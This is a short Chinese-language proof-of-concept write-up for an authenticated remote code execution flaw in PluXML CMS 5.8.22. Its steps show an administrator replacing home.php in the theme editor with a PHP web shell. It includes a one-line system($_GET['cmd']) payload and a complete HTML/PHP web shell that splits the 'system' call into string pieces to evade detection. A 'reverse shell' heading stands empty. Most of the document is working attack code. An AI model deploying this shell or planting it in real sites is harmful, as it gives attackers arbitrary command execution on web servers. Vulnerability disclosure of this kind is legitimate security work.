
在 PluXML CMS 版本 5.8.22 中发现了一个严重的远程代码执行(RCE)漏洞。该漏洞允许经过认证的管理员通过主题编辑器功能上传恶意 PHP Web Shell,从而在 Web 服务器上执行任意 PHP 代码。
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
逐步利用过程
认证:使用有效的管理员凭据登录 PluXML 管理面板 导航到主题编辑器:
访问管理仪表板
导航到:主题 → Home.php → 编辑

注入恶意载荷:
将 home.php 中的现有内容替换为 PHP web shell
示例载荷:<?php system($_GET['cmd']); ?>
保存修改后的文件
触发执行:
访问网站的主页 注入的 PHP 代码以 Web 服务器权限执行
反向 Shell
Webshell 载荷
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>